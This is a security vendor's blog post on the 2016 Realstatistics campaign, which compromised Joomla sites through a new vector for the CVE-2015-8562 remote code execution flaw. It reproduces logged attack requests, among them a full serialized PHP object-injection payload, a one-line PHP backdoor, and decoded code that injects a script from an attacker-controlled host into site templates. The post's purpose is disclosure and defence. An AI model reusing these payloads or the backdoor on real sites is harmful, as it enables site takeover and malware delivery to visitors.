• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

New Realstatistics Attack Vector Compromising Joomla Sites

July 15, 2016Caleb LaneEspanolPortugues

FacebookTwitterSubscribe

Nov 2016 Update: If your Joomla site has been hacked, you can follow our guide to fixing it.

Read the Guide!

Over the past few weeks we’ve seen a large number of Joomla websites compromised with the Realstatistics malware campaign. This mass infection is still evolving and continues to distribute harmful ransomware to compromised website visitors.

Today we are providing more context on the new attack vector and exploitation process used to to compromise these sites.

Joomla CVE-2015-8562

The initial attack vector is a variation of the Remote Command Execution vulnerability in Joomla that was heavily exploited at the end of last year. Despite the fact that it has been patched, we still see many attempts to exploit this vulnerability using the original methods we disclosed. Almost all web application firewalls have now virtually patched this variation of the exploit. As a result, we see fewer successful attempts at compromising Joomla sites with this older vulnerability.

The new variation we discovered is using a new vector with the filter-search option which hasn’t yet been disclosed.  This results in a far higher success rate, and has a lot to do with why the Realstatistics malware campaign is successful in compromising a high number of sites in such a short period of time.

New Attack Vector

46.183.219.91 - - [19/Jun/2016:03:16:21 -0400] 
"POST /?option=com_tags HTTP/1.1" 403 4229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 
"POSTLOG:filter-search=bigus%7D__hxsjcurrrt%7CO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A71%3A%22eval%28base64_decode%28%24_SERVER%5B%27HTTP_QGYSD%27%5D%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%3B%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7D\xF0\xFD\xFD\xFD"

As you can see from the date stamp, the initial vulnerability was exploited in June, but we didn’t see attempts to access the backdoor until the beginning of July:

46.183.219.91 - - [01/Jul/2016:04:41:20 -0400] 
"POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 
"POSTLOG:&php_func=assert&php=print%28%22MY_S%22.%22UCCESS%22%29%3B"

With this request, attackers are simply testing whether the backdoor installation was successful or not.

The content of this backdoor is common to many backdoors we see:

<?php if(isset($_POST["php_func"])){@$_POST["php_func"](stripslashes($_POST["php"]));};?>

Payload

After the attempts to see whether the backdoor was successful or not, attackers attempt to inject the payload utilizing the backdoor.

46.183.219.91 - - [01/Jul/2016:09:35:27 -0400] 
"POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 
"POSTLOG:&php_func=assert&php=assert%28base64_decode%28str_rot13%28%27MKMuoPuvLKAyAwEsMTIwo2EyXUA0py9lo3DkZltaHHEwnaO6rJukHR52EwWWAHDlqKyZZzqHpUb5nUSDIwqEETWOHUMSHxIVI0ySoGOgDzbjJRAgAQuQZ09vpR4jJSSRLauhFwIxFmWOnH1HFUEQEx5uD1IOq3O6rJckHR9zGRb1LKSXH2SAEmO2EacGZxkWDKqjraydpIOJqUSIrJcAEmO2pIEWAUSDBIuZF011FQWOoT5YGmOJqx9gpUcnBIM6qGOkIH42JJj5oR1XH2MjZ0I1pIE5oKSHrKqjoQIdpUb4nJ5uJzyZFwI1o1I5ZT5XDJ1M….”

That is just part of the encoded payload in the request above, but after decoding the full payload this is the result:

print "KeyCheckFront";
...

$inj_code = '<script language="JavaScript" type="text/JavaScript" 

src="hxxp://realstatistics[.]pro/js/analytics.php?id=123"></script>';

//$inj_code = '<!-- lol777 -->';

$inj_search = '</head>';
...

As you can see from the code, the payload is injecting fake Realstatistics analytics code into the head section of any PHP template on the site.

Check Your Joomla Sites

This infection is only impacting unpatched Joomla sites, so make sure that your Joomla sites are up-to-date. This is a new attack vector on an old vulnerability, so if you can’t patch, you should be sure your website firewall is virtually patching this new variation.

We recommend checking your logs for requests from 46 .183 .219 .91 – if you find requests similar to the ones in this post, consider your website compromised. At this point you should take steps to remove the malware immediately and prevent reinfection.

If you are using our CloudProxy Website Firewall, your site is protected against this vulnerability through our virtual patching feature.  Our incident response team is always standing by ready to assist you in cleaning and protecting your site if you need assistance.

FacebookTwitterSubscribe

Categories: Joomla Security, Website Malware InfectionsTags: Malware Updates, Obfuscation, Website Backdoor, Website Ransomware

About Caleb Lane

Caleb is a Firewall Analyst at Sucuri. He enjoys working with clients to configure the website firewall and follow best practices to prevent their site from getting infected, so they can focus on what they do best - running their site and business.

Reader Interactions

Comments

  1. Jim Walker

    July 15, 2016

    Thank you for your continued updates on this issue. Is great information for the community.
    You are appreciated. 🙂

    • Daniel Cid

      July 15, 2016

      Glad to help!

  2. olleperson66

    September 21, 2016

    Yes thanks for update the Joomla community! cheers!

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.